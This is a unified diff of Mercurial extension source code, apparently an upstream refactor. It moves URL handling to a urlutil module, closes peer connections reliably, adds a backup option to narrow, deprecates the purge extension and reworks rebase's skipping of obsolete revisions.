+ revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None)
other = hg.peer(repo, opts, dest)
if revs:
@@ -1581,10 +1583,19 @@
def layout(mode):
maxy, maxx = stdscr.getmaxyx()
helplen = len(helplines(mode))
+ mainlen = maxy - helplen - 12
+ if mainlen < 1:
+ raise error.Abort(
+ _(b"terminal dimensions %d by %d too small for curses histedit")
+ % (maxy, maxx),
+ hint=_(
+ b"enlarge your terminal or use --config ui.interface=text"
+ ),
+ )
return {
b'commit': (12, maxx),
b'help': (helplen, maxx),
- b'main': (maxy - helplen - 12, maxx),
+ b'main': (mainlen, maxx),
}
def drawvertwin(size, y, x):
@@ -1614,63 +1625,60 @@
stdscr.clear()
stdscr.refresh()
while True:
- try:
- oldmode, _ = state[b'mode']
- if oldmode == MODE_INIT:
- changemode(state, MODE_RULES)
- e = event(state, ch)
-
- if e == E_QUIT:
- return False
- if e == E_HISTEDIT:
- return state[b'rules']
+ oldmode, unused = state[b'mode']
+ if oldmode == MODE_INIT:
+ changemode(state, MODE_RULES)
+ e = event(state, ch)
+
+ if e == E_QUIT:
+ return False
+ if e == E_HISTEDIT:
+ return state[b'rules']
+ else:
+ if e == E_RESIZE:
+ size = screen_size()
+ if size != stdscr.getmaxyx():
+ curses.resizeterm(*size)
+
+ curmode, unused = state[b'mode']
+ sizes = layout(curmode)
+ if curmode != oldmode:
+ state[b'page_height'] = sizes[b'main'][0]
+ # Adjust the view to fit the current screen size.
+ movecursor(state, state[b'pos'], state[b'pos'])
+
+ # Pack the windows against the top, each pane spread across the
+ # full width of the screen.
+ y, x = (0, 0)
+ helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
+ mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
+ commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
+
+ if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
+ if e == E_PAGEDOWN:
+ changeview(state, +1, b'page')
+ elif e == E_PAGEUP:
+ changeview(state, -1, b'page')
+ elif e == E_LINEDOWN:
+ changeview(state, +1, b'line')
+ elif e == E_LINEUP:
+ changeview(state, -1, b'line')
+
+ # start rendering
+ commitwin.erase()
+ helpwin.erase()
+ mainwin.erase()
+ if curmode == MODE_PATCH:
+ renderpatch(mainwin, state)
+ elif curmode == MODE_HELP:
+ renderstring(mainwin, state, __doc__.strip().splitlines())
else:
- if e == E_RESIZE:
- size = screen_size()
- if size != stdscr.getmaxyx():
- curses.resizeterm(*size)
-
- curmode, _ = state[b'mode']
- sizes = layout(curmode)
- if curmode != oldmode:
- state[b'page_height'] = sizes[b'main'][0]
- # Adjust the view to fit the current screen size.
- movecursor(state, state[b'pos'], state[b'pos'])
-
- # Pack the windows against the top, each pane spread across the
- # full width of the screen.
- y, x = (0, 0)
- helpwin, y, x = drawvertwin(sizes[b'help'], y, x)
- mainwin, y, x = drawvertwin(sizes[b'main'], y, x)
- commitwin, y, x = drawvertwin(sizes[b'commit'], y, x)
-
- if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP):
- if e == E_PAGEDOWN:
- changeview(state, +1, b'page')
- elif e == E_PAGEUP:
- changeview(state, -1, b'page')
- elif e == E_LINEDOWN:
- changeview(state, +1, b'line')
- elif e == E_LINEUP:
- changeview(state, -1, b'line')
-
- # start rendering
- commitwin.erase()
- helpwin.erase()
- mainwin.erase()
- if curmode == MODE_PATCH:
- renderpatch(mainwin, state)
- elif curmode == MODE_HELP:
- renderstring(mainwin, state, __doc__.strip().splitlines())
- else:
- renderrules(mainwin, state)
- rendercommit(commitwin, state)
- renderhelp(helpwin, state)
- curses.doupdate()
- # done rendering
- ch = encoding.strtolocal(stdscr.getkey())
- except curses.error:
- pass
+ renderrules(mainwin, state)
+ rendercommit(commitwin, state)
+ renderhelp(helpwin, state)
+ curses.doupdate()
+ # done rendering
+ ch = encoding.strtolocal(stdscr.getkey())
def _chistedit(ui, repo, freeargs, opts):
--- a/hgext/infinitepush/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/infinitepush/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -116,6 +116,7 @@
from mercurial.utils import (
procutil,
stringutil,
+ urlutil,
)
from mercurial import (
@@ -683,7 +684,13 @@
def _pull(orig, ui, repo, source=b"default", **opts):
opts = pycompat.byteskwargs(opts)
# Copy paste from `pull` command
- source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch'))
+ source, branches = urlutil.get_unique_pull_path(
+ b"infinite-push's pull",
+ repo,
+ ui,
+ source,
+ default_branches=opts.get(b'branch'),
+ )
scratchbookmarks = {}
unfi = repo.unfiltered()
@@ -704,16 +711,19 @@
if scratchbookmarks:
other = hg.peer(repo, opts, source)
- fetchedbookmarks = other.listkeyspatterns(
- b'bookmarks', patterns=scratchbookmarks
- )
- for bookmark in scratchbookmarks:
- if bookmark not in fetchedbookmarks:
- raise error.Abort(
- b'remote bookmark %s not found!' % bookmark
- )
- scratchbookmarks[bookmark] = fetchedbookmarks[bookmark]
- revs.append(fetchedbookmarks[bookmark])
+ try:
+ fetchedbookmarks = other.listkeyspatterns(
+ b'bookmarks', patterns=scratchbookmarks
+ )
+ for bookmark in scratchbookmarks:
+ if bookmark not in fetchedbookmarks:
+ raise error.Abort(
+ b'remote bookmark %s not found!' % bookmark
+ )
+ scratchbookmarks[bookmark] = fetchedbookmarks[bookmark]
+ revs.append(fetchedbookmarks[bookmark])
+ finally:
+ other.close()
opts[b'bookmark'] = bookmarks
opts[b'rev'] = revs
@@ -805,7 +815,7 @@
return common, True, remoteheads
-def _push(orig, ui, repo, dest=None, *args, **opts):
+def _push(orig, ui, repo, *dests, **opts):
opts = pycompat.byteskwargs(opts)
bookmark = opts.get(b'bookmark')
# we only support pushing one infinitepush bookmark at once
@@ -833,25 +843,28 @@
oldphasemove = extensions.wrapfunction(
exchange, b'_localphasemove', _phasemove
)
- # Copy-paste from `push` command
- path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
- if not path:
- raise error.Abort(
- _(b'default repository not configured!'),
- hint=_(b"see 'hg help config.paths'"),
- )
+
+ paths = list(urlutil.get_push_paths(repo, ui, dests))
+ if len(paths) > 1:
+ msg = _(b'cannot push to multiple path with infinitepush')
+ raise error.Abort(msg)
+
+ path = paths[0]
destpath = path.pushloc or path.loc
# Remote scratch bookmarks will be deleted because remotenames doesn't
# know about them. Let's save it before push and restore after
remotescratchbookmarks = _readscratchremotebookmarks(ui, repo, destpath)
- result = orig(ui, repo, dest, *args, **pycompat.strkwargs(opts))
+ result = orig(ui, repo, *dests, **pycompat.strkwargs(opts))
if common.isremotebooksenabled(ui):
if bookmark and scratchpush:
other = hg.peer(repo, opts, destpath)
- fetchedbookmarks = other.listkeyspatterns(
- b'bookmarks', patterns=[bookmark]
- )
- remotescratchbookmarks.update(fetchedbookmarks)
+ try:
+ fetchedbookmarks = other.listkeyspatterns(
+ b'bookmarks', patterns=[bookmark]
+ )
+ remotescratchbookmarks.update(fetchedbookmarks)
+ finally:
+ other.close()
_saveremotebookmarks(repo, remotescratchbookmarks, destpath)
if oldphasemove:
exchange._localphasemove = oldphasemove
--- a/hgext/largefiles/basestore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/basestore.py Tue Apr 20 11:01:06 2021 -0400
@@ -12,6 +12,9 @@
from mercurial.i18n import _
from mercurial import node, util
+from mercurial.utils import (
+ urlutil,
+)
from . import lfutil
@@ -29,13 +32,13 @@
def longmessage(self):
return _(b"error getting id %s from url %s for file %s: %s\n") % (
self.hash,
- util.hidepassword(self.url),
+ urlutil.hidepassword(self.url),
self.filename,
self.detail,
)
def __str__(self):
- return b"%s: %s" % (util.hidepassword(self.url), self.detail)
+ return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail)
class basestore(object):
@@ -79,7 +82,7 @@
if not available.get(hash):
ui.warn(
_(b'%s: largefile %s not available from %s\n')
- % (filename, hash, util.hidepassword(self.url))
+ % (filename, hash, urlutil.hidepassword(self.url))
)
missing.append(filename)
continue
--- a/hgext/largefiles/lfutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/lfutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -206,6 +206,7 @@
repo.root,
repo.dirstate._validate,
lambda: sparse.matcher(repo),
+ repo.nodeconstants,
)
# If the largefiles dirstate does not exist, populate and create
@@ -513,7 +514,7 @@
def islfilesrepo(repo):
'''Return true if the repo is a largefile repo.'''
if b'largefiles' in repo.requirements and any(
- shortnameslash in f[0] for f in repo.store.datafiles()
+ shortnameslash in f[1] for f in repo.store.datafiles()
):
return True
--- a/hgext/largefiles/overrides.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/overrides.py Tue Apr 20 11:01:06 2021 -0400
@@ -1567,7 +1567,7 @@
# Calling purge with --all will cause the largefiles to be deleted.
# Override repo.status to prevent this from happening.
-@eh.wrapcommand(b'purge', extension=b'purge')
+@eh.wrapcommand(b'purge')
def overridepurge(orig, ui, repo, *dirs, **opts):
# XXX Monkey patching a repoview will not work. The assigned attribute will
# be set on the unfiltered repo, but we will only lookup attributes in the
--- a/hgext/largefiles/remotestore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/remotestore.py Tue Apr 20 11:01:06 2021 -0400
@@ -15,7 +15,10 @@
util,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
from . import (
basestore,
@@ -40,11 +43,11 @@
if self.sendfile(source, hash):
raise error.Abort(
_(b'remotestore: could not put %s to remote store %s')
- % (source, util.hidepassword(self.url))
+ % (source, urlutil.hidepassword(self.url))
)
self.ui.debug(
_(b'remotestore: put %s to remote store %s\n')
- % (source, util.hidepassword(self.url))
+ % (source, urlutil.hidepassword(self.url))
)
def exists(self, hashes):
@@ -80,7 +83,7 @@
# keep trying with the other files... they will probably
# all fail too.
raise error.Abort(
- b'%s: %s' % (util.hidepassword(self.url), e.reason)
+ b'%s: %s' % (urlutil.hidepassword(self.url), e.reason)
)
except IOError as e:
raise basestore.StoreError(
--- a/hgext/largefiles/reposetup.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/reposetup.py Tue Apr 20 11:01:06 2021 -0400
@@ -445,7 +445,7 @@
def checkrequireslfiles(ui, repo, **kwargs):
if b'largefiles' not in repo.requirements and any(
- lfutil.shortname + b'/' in f[0] for f in repo.store.datafiles()
+ lfutil.shortname + b'/' in f[1] for f in repo.store.datafiles()
):
repo.requirements.add(b'largefiles')
scmutil.writereporequirements(repo)
--- a/hgext/largefiles/storefactory.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/largefiles/storefactory.py Tue Apr 20 11:01:06 2021 -0400
@@ -12,6 +12,9 @@
hg,
util,
)
+from mercurial.utils import (
+ urlutil,
+)
from . import (
lfutil,
@@ -19,6 +22,7 @@
wirestore,
)
+
# During clone this function is passed the src's ui object
# but it needs the dest's ui object so it can read out of
# the config file. Use repo.ui instead.
@@ -28,24 +32,27 @@
if not remote:
lfpullsource = getattr(repo, 'lfpullsource', None)
- if lfpullsource:
- path = ui.expandpath(lfpullsource)
- elif put:
- path = ui.expandpath(b'default-push', b'default')
+ if put:
+ path = urlutil.get_unique_push_path(
+ b'lfpullsource', repo, ui, lfpullsource
+ )
else:
- path = ui.expandpath(b'default')
+ path, _branches = urlutil.get_unique_pull_path(
+ b'lfpullsource', repo, ui, lfpullsource
+ )
- # ui.expandpath() leaves 'default-push' and 'default' alone if
- # they cannot be expanded: fallback to the empty string,
- # meaning the current directory.
+ # XXX we should not explicitly pass b'default', as this will result in
+ # b'default' being returned if no `paths.default` was defined. We
+ # should explicitely handle the lack of value instead.
if repo is None:
- path = ui.expandpath(b'default')
- path, _branches = hg.parseurl(path)
+ path, _branches = urlutil.get_unique_pull_path(
+ b'lfs', repo, ui, b'default'
+ )
remote = hg.peer(repo or ui, {}, path)
elif path == b'default-push' or path == b'default':
remote = repo
else:
- path, _branches = hg.parseurl(path)
+ path, _branches = urlutil.parseurl(path)
remote = hg.peer(repo or ui, {}, path)
# The path could be a scheme so use Mercurial's normal functionality
@@ -71,7 +78,7 @@
raise error.Abort(
_(b'%s does not appear to be a largefile store')
- % util.hidepassword(path)
+ % urlutil.hidepassword(path)
)
--- a/hgext/lfs/blobstore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/lfs/blobstore.py Tue Apr 20 11:01:06 2021 -0400
@@ -31,7 +31,10 @@
worker,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
from ..largefiles import lfutil
@@ -725,7 +728,7 @@
https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md
"""
lfsurl = repo.ui.config(b'lfs', b'url')
- url = util.url(lfsurl or b'')
+ url = urlutil.url(lfsurl or b'')
if lfsurl is None:
if remote:
path = remote
@@ -739,7 +742,7 @@
# and fall back to inferring from 'paths.remote' if unspecified.
path = repo.ui.config(b'paths', b'default') or b''
- defaulturl = util.url(path)
+ defaulturl = urlutil.url(path)
# TODO: support local paths as well.
# TODO: consider the ssh -> https transformation that git applies
@@ -748,7 +751,7 @@
defaulturl.path += b'/'
defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs'
- url = util.url(bytes(defaulturl))
+ url = urlutil.url(bytes(defaulturl))
repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url)
scheme = url.scheme
--- a/hgext/lfs/wrapper.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/lfs/wrapper.py Tue Apr 20 11:01:06 2021 -0400
@@ -116,10 +116,10 @@
if hgmeta or text.startswith(b'\1\n'):
text = storageutil.packmeta(hgmeta, text)
- return (text, True, {})
+ return (text, True)
-def writetostore(self, text, sidedata):
+def writetostore(self, text):
# hg filelog metadata (includes rename, etc)
hgmeta, offset = storageutil.parsemeta(text)
if offset and offset > 0:
--- a/hgext/mq.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/mq.py Tue Apr 20 11:01:06 2021 -0400
@@ -108,6 +108,7 @@
from mercurial.utils import (
dateutil,
stringutil,
+ urlutil,
)
release = lockmod.release
@@ -2509,7 +2510,7 @@
)
filename = normname(filename)
self.checkreservedname(filename)
- if util.url(filename).islocal():
+ if urlutil.url(filename).islocal():
originpath = self.join(filename)
if not os.path.isfile(originpath):
raise error.Abort(
@@ -2862,11 +2863,12 @@
# main repo (destination and sources)
if dest is None:
dest = hg.defaultdest(source)
- sr = hg.peer(ui, opts, ui.expandpath(source))
+ __, source_path, __ = urlutil.get_clone_path(ui, source)
+ sr = hg.peer(ui, opts, source_path)
# patches repo (source only)
if opts.get(b'patches'):
- patchespath = ui.expandpath(opts.get(b'patches'))
+ __, patchespath, __ = urlutil.get_clone_path(ui, opts.get(b'patches'))
else:
patchespath = patchdir(sr)
try:
--- a/hgext/narrow/narrowcommands.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/narrow/narrowcommands.py Tue Apr 20 11:01:06 2021 -0400
@@ -36,6 +36,9 @@
util,
wireprototypes,
)
+from mercurial.utils import (
+ urlutil,
+)
table = {}
command = registrar.command(table)
@@ -214,6 +217,7 @@
newincludes,
newexcludes,
force,
+ backup,
):
oldmatch = narrowspec.match(repo.root, oldincludes, oldexcludes)
newmatch = narrowspec.match(repo.root, newincludes, newexcludes)
@@ -272,10 +276,10 @@
hg.clean(repo, urev)
overrides = {(b'devel', b'strip-obsmarkers'): False}
with ui.configoverride(overrides, b'narrow'):
- repair.strip(ui, unfi, tostrip, topic=b'narrow')
+ repair.strip(ui, unfi, tostrip, topic=b'narrow', backup=backup)
todelete = []
- for f, f2, size in repo.store.datafiles():
+ for t, f, f2, size in repo.store.datafiles():
if f.startswith(b'data/'):
file = f[5:-2]
if not newmatch(file):
@@ -442,6 +446,12 @@
),
(
b'',
+ b'backup',
+ True,
+ _(b'back up local changes when narrowing'),
+ ),
+ (
+ b'',
b'update-working-copy',
False,
_(b'update working copy when the store has changed'),
@@ -583,81 +593,88 @@
# Find the revisions we have in common with the remote. These will
# be used for finding local-only changes for narrowing. They will
# also define the set of revisions to update for widening.
- remotepath = ui.expandpath(remotepath or b'default')
- url, branches = hg.parseurl(remotepath)
- ui.status(_(b'comparing with %s\n') % util.hidepassword(url))
+ r = urlutil.get_unique_pull_path(b'tracked', repo, ui, remotepath)
+ url, branches = r
+ ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url))
remote = hg.peer(repo, opts, url)
- # check narrow support before doing anything if widening needs to be
- # performed. In future we should also abort if client is ellipses and
- # server does not support ellipses
- if widening and wireprototypes.NARROWCAP not in remote.capabilities():
- raise error.Abort(_(b"server does not support narrow clones"))
+ try:
+ # check narrow support before doing anything if widening needs to be
+ # performed. In future we should also abort if client is ellipses and
+ # server does not support ellipses
+ if (
+ widening
+ and wireprototypes.NARROWCAP not in remote.capabilities()
+ ):
+ raise error.Abort(_(b"server does not support narrow clones"))
- commoninc = discovery.findcommonincoming(repo, remote)
+ commoninc = discovery.findcommonincoming(repo, remote)
- if autoremoveincludes:
- outgoing = discovery.findcommonoutgoing(
- repo, remote, commoninc=commoninc
- )
- ui.status(_(b'looking for unused includes to remove\n'))
- localfiles = set()
- for n in itertools.chain(outgoing.missing, outgoing.excluded):
- localfiles.update(repo[n].files())
- suggestedremovals = []
- for include in sorted(oldincludes):
- match = narrowspec.match(repo.root, [include], oldexcludes)
- if not any(match(f) for f in localfiles):
- suggestedremovals.append(include)
- if suggestedremovals:
- for s in suggestedremovals:
- ui.status(b'%s\n' % s)
- if (
- ui.promptchoice(
- _(
- b'remove these unused includes (yn)?'
- b'$$ &Yes $$ &No'
+ if autoremoveincludes:
+ outgoing = discovery.findcommonoutgoing(
+ repo, remote, commoninc=commoninc
+ )
+ ui.status(_(b'looking for unused includes to remove\n'))
+ localfiles = set()
+ for n in itertools.chain(outgoing.missing, outgoing.excluded):
+ localfiles.update(repo[n].files())
+ suggestedremovals = []
+ for include in sorted(oldincludes):
+ match = narrowspec.match(repo.root, [include], oldexcludes)
+ if not any(match(f) for f in localfiles):
+ suggestedremovals.append(include)
+ if suggestedremovals:
+ for s in suggestedremovals:
+ ui.status(b'%s\n' % s)
+ if (
+ ui.promptchoice(
+ _(
+ b'remove these unused includes (yn)?'
+ b'$$ &Yes $$ &No'
+ )
)
- )
- == 0
- ):
- removedincludes.update(suggestedremovals)
- narrowing = True
- else:
- ui.status(_(b'found no unused includes\n'))
+ == 0
+ ):
+ removedincludes.update(suggestedremovals)
+ narrowing = True
+ else:
+ ui.status(_(b'found no unused includes\n'))
- if narrowing:
- newincludes = oldincludes - removedincludes
- newexcludes = oldexcludes | addedexcludes
- _narrow(
- ui,
- repo,
- remote,
- commoninc,
- oldincludes,
- oldexcludes,
- newincludes,
- newexcludes,
- opts[b'force_delete_local_changes'],
- )
- # _narrow() updated the narrowspec and _widen() below needs to
- # use the updated values as its base (otherwise removed includes
- # and addedexcludes will be lost in the resulting narrowspec)
- oldincludes = newincludes
- oldexcludes = newexcludes
+ if narrowing:
+ newincludes = oldincludes - removedincludes
+ newexcludes = oldexcludes | addedexcludes
+ _narrow(
+ ui,
+ repo,
+ remote,
+ commoninc,
+ oldincludes,
+ oldexcludes,
+ newincludes,
+ newexcludes,
+ opts[b'force_delete_local_changes'],
+ opts[b'backup'],
+ )
+ # _narrow() updated the narrowspec and _widen() below needs to
+ # use the updated values as its base (otherwise removed includes
+ # and addedexcludes will be lost in the resulting narrowspec)
+ oldincludes = newincludes
+ oldexcludes = newexcludes
- if widening:
- newincludes = oldincludes | addedincludes
- newexcludes = oldexcludes - removedexcludes
- _widen(
- ui,
- repo,
- remote,
- commoninc,
- oldincludes,
- oldexcludes,
- newincludes,
- newexcludes,
- )
+ if widening:
+ newincludes = oldincludes | addedincludes
+ newexcludes = oldexcludes - removedexcludes
+ _widen(
+ ui,
+ repo,
+ remote,
+ commoninc,
+ oldincludes,
+ oldexcludes,
+ newincludes,
+ newexcludes,
+ )
+ finally:
+ remote.close()
return 0
--- a/hgext/patchbomb.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/patchbomb.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# patchbomb.py - sending Mercurial changesets as patch emails
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -99,7 +99,10 @@
templater,
util,
)
-from mercurial.utils import dateutil
+from mercurial.utils import (
+ dateutil,
+ urlutil,
+)
stringio = util.stringio
@@ -379,7 +382,10 @@
if btype:
opts['type'] = btype
try:
- commands.bundle(ui, repo, tmpfn, dest, **opts)
+ dests = []
+ if dest:
+ dests = [dest]
+ commands.bundle(ui, repo, tmpfn, *dests, **opts)
return util.readfile(tmpfn)
finally:
try:
@@ -527,9 +533,9 @@
def _getoutgoing(repo, dest, revs):
'''Return the revisions present locally but not in dest'''
ui = repo.ui
- url = ui.expandpath(dest or b'default-push', dest or b'default')
- url = hg.parseurl(url)[0]
- ui.status(_(b'comparing with %s\n') % util.hidepassword(url))
+ paths = urlutil.get_push_paths(repo, ui, [dest])
+ safe_paths = [urlutil.hidepassword(p.rawloc) for p in paths]
+ ui.status(_(b'comparing with %s\n') % b','.join(safe_paths))
revs = [r for r in revs if r >= 0]
if not revs:
--- a/hgext/phabricator.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/phabricator.py Tue Apr 20 11:01:06 2021 -0400
@@ -103,6 +103,7 @@
from mercurial.utils import (
procutil,
stringutil,
+ urlutil,
)
from . import show
@@ -366,7 +367,7 @@
process(k, v)
process(b'', params)
- return util.urlreq.urlencode(flatparams)
+ return urlutil.urlreq.urlencode(flatparams)
def readurltoken(ui):
@@ -381,7 +382,7 @@
_(b'config %s.%s is required') % (b'phabricator', b'url')
)
- res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user)
+ res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user)
token = None
if res:
--- a/hgext/purge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/purge.py Tue Apr 20 11:01:06 2021 -0400
@@ -22,115 +22,11 @@
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>.
-'''command to delete untracked files from the working directory'''
-from __future__ import absolute_import
-
-from mercurial.i18n import _
-from mercurial import (
- cmdutil,
- merge as mergemod,
- pycompat,
- registrar,
- scmutil,
-)
-
-cmdtable = {}
-command = registrar.command(cmdtable)
-# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
-# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
-# be specifying the version(s) of Mercurial they are tested with, or
-# leave the attribute unspecified.
-testedwith = b'ships-with-hg-core'
-
-
-@command(
- b'purge|clean',
- [
- (b'a', b'abort-on-err', None, _(b'abort if an error occurs')),
- (b'', b'all', None, _(b'purge ignored files too')),
- (b'i', b'ignored', None, _(b'purge only ignored files')),
- (b'', b'dirs', None, _(b'purge empty directories')),
- (b'', b'files', None, _(b'purge files')),
- (b'p', b'print', None, _(b'print filenames instead of deleting them')),
- (
- b'0',
- b'print0',
- None,
- _(
- b'end filenames with NUL, for use with xargs'
- b' (implies -p/--print)'
- ),
- ),
- ]
- + cmdutil.walkopts,
- _(b'hg purge [OPTION]... [DIR]...'),
- helpcategory=command.CATEGORY_WORKING_DIRECTORY,
-)
-def purge(ui, repo, *dirs, **opts):
- """removes files not tracked by Mercurial
-
- Delete files not known to Mercurial. This is useful to test local
- and uncommitted changes in an otherwise-clean source tree.
-
- This means that purge will delete the following by default:
-
- - Unknown files: files marked with "?" by :hg:`status`
- - Empty directories: in fact Mercurial ignores directories unless
- they contain files under source control management
+'''command to delete untracked files from the working directory (DEPRECATED)
- But it will leave untouched:
-
- - Modified and unmodified tracked files
- - Ignored files (unless -i or --all is specified)
- - New files added to the repository (with :hg:`add`)
-
- The --files and --dirs options can be used to direct purge to delete
- only files, only directories, or both. If neither option is given,
- both will be deleted.
-
- If directories are given on the command line, only files in these
- directories are considered.
-
- Be careful with purge, as you could irreversibly delete some files
- you forgot to add to the repository. If you only want to print the
- list of files that this program would delete, use the --print
- option.
- """
- opts = pycompat.byteskwargs(opts)
- cmdutil.check_at_most_one_arg(opts, b'all', b'ignored')
+The functionality of this extension has been included in core Mercurial since
+version 5.7. Please use :hg:`purge ...` instead. :hg:`purge --confirm` is now the default, unless the extension is enabled for backward compatibility.
+'''
- act = not opts.get(b'print')
- eol = b'\n'
- if opts.get(b'print0'):
- eol = b'\0'
- act = False # --print0 implies --print
- if opts.get(b'all', False):
- ignored = True
- unknown = True
- else:
- ignored = opts.get(b'ignored', False)
- unknown = not ignored
-
- removefiles = opts.get(b'files')
- removedirs = opts.get(b'dirs')
-
- if not removefiles and not removedirs:
- removefiles = True
- removedirs = True
-
- match = scmutil.match(repo[None], dirs, opts)
-
- paths = mergemod.purge(
- repo,
- match,
- unknown=unknown,
- ignored=ignored,
- removeemptydirs=removedirs,
- removefiles=removefiles,
- abortonerror=opts.get(b'abort_on_err'),
- noop=not act,
- )
-
- for path in paths:
- if not act:
- ui.write(b'%s%s' % (path, eol))
+# This empty extension looks pointless, but core mercurial checks if it's loaded
+# to implement the slightly different behavior documented above.
--- a/hgext/rebase.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/rebase.py Tue Apr 20 11:01:06 2021 -0400
@@ -67,6 +67,14 @@
cmdtable = {}
command = registrar.command(cmdtable)
+
+configtable = {}
+configitem = registrar.configitem(configtable)
+configitem(
+ b'devel',
+ b'rebase.force-in-memory-merge',
+ default=False,
+)
# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
@@ -136,7 +144,7 @@
return smartset.baseset()
dests = destutil.orphanpossibledestination(repo, src)
if len(dests) > 1:
- raise error.Abort(
+ raise error.StateError(
_(b"ambiguous automatic rebase: %r could end up on any of %r")
% (src, dests)
)
@@ -197,8 +205,8 @@
self.skipemptysuccessorf = rewriteutil.skip_empty_successor(
repo.ui, b'rebase'
)
- self.obsoletenotrebased = {}
- self.obsoletewithoutsuccessorindestination = set()
+ self.obsolete_with_successor_in_destination = {}
+ self.obsolete_with_successor_in_rebase_set = set()
self.inmemory = inmemory
self.dryrun = dryrun
self.stateobj = statemod.cmdstate(repo, b'rebasestate')
@@ -340,25 +348,33 @@
return data
- def _handleskippingobsolete(self, obsoleterevs, destmap):
- """Compute structures necessary for skipping obsolete revisions
-
- obsoleterevs: iterable of all obsolete revisions in rebaseset
- destmap: {srcrev: destrev} destination revisions
- """
- self.obsoletenotrebased = {}
+ def _handleskippingobsolete(self):
+ """Compute structures necessary for skipping obsolete revisions"""
+ if self.keepf:
+ return
if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'):
return
- obsoleteset = set(obsoleterevs)
+ obsoleteset = {r for r in self.state if self.repo[r].obsolete()}
(
- self.obsoletenotrebased,
- self.obsoletewithoutsuccessorindestination,
- obsoleteextinctsuccessors,
- ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap)
- skippedset = set(self.obsoletenotrebased)
- skippedset.update(self.obsoletewithoutsuccessorindestination)
- skippedset.update(obsoleteextinctsuccessors)
+ self.obsolete_with_successor_in_destination,
+ self.obsolete_with_successor_in_rebase_set,
+ ) = _compute_obsolete_sets(self.repo, obsoleteset, self.destmap)
+ skippedset = set(self.obsolete_with_successor_in_destination)
+ skippedset.update(self.obsolete_with_successor_in_rebase_set)
_checkobsrebase(self.repo, self.ui, obsoleteset, skippedset)
+ allowdivergence = self.ui.configbool(
+ b'experimental', b'evolution.allowdivergence'
+ )
+ if allowdivergence:
+ self.obsolete_with_successor_in_rebase_set = set()
+ else:
+ for rev in self.repo.revs(
+ b'descendants(%ld) and not %ld',
+ self.obsolete_with_successor_in_rebase_set,
+ self.obsolete_with_successor_in_rebase_set,
+ ):
+ self.state.pop(rev, None)
+ self.destmap.pop(rev, None)
def _prepareabortorcontinue(
self, isabort, backup=True, suppwarns=False, dryrun=False, confirm=False
@@ -366,6 +382,8 @@
self.resume = True
try:
self.restorestatus()
+ # Calculate self.obsolete_* sets
+ self._handleskippingobsolete()
self.collapsemsg = restorecollapsemsg(self.repo, isabort)
except error.RepoLookupError:
if isabort:
@@ -396,15 +414,6 @@
if not destmap:
return _nothingtorebase()
- rebaseset = destmap.keys()
- if not self.keepf:
- try:
- rewriteutil.precheck(self.repo, rebaseset, action=b'rebase')
- except error.Abort as e:
- if e.hint is None:
- e.hint = _(b'use --keep to keep original changesets')
- raise e
-
result = buildstate(self.repo, destmap, self.collapsef)
if not result:
@@ -416,7 +425,7 @@
if self.collapsef:
dests = set(self.destmap.values())
if len(dests) != 1:
- raise error.Abort(
+ raise error.InputError(
_(b'--collapse does not work with multiple destinations')
)
destrev = next(iter(dests))
@@ -430,6 +439,20 @@
if dest.closesbranch() and not self.keepbranchesf:
self.ui.status(_(b'reopening closed branch head %s\n') % dest)
+ # Calculate self.obsolete_* sets
+ self._handleskippingobsolete()
+
+ if not self.keepf:
+ rebaseset = set(destmap.keys())
+ rebaseset -= set(self.obsolete_with_successor_in_destination)
+ rebaseset -= self.obsolete_with_successor_in_rebase_set
+ try:
+ rewriteutil.precheck(self.repo, rebaseset, action=b'rebase')
+ except error.Abort as e:
+ if e.hint is None:
+ e.hint = _(b'use --keep to keep original changesets')
+ raise e
+
self.prepared = True
def _assignworkingcopy(self):
@@ -461,14 +484,10 @@
for rev in self.state:
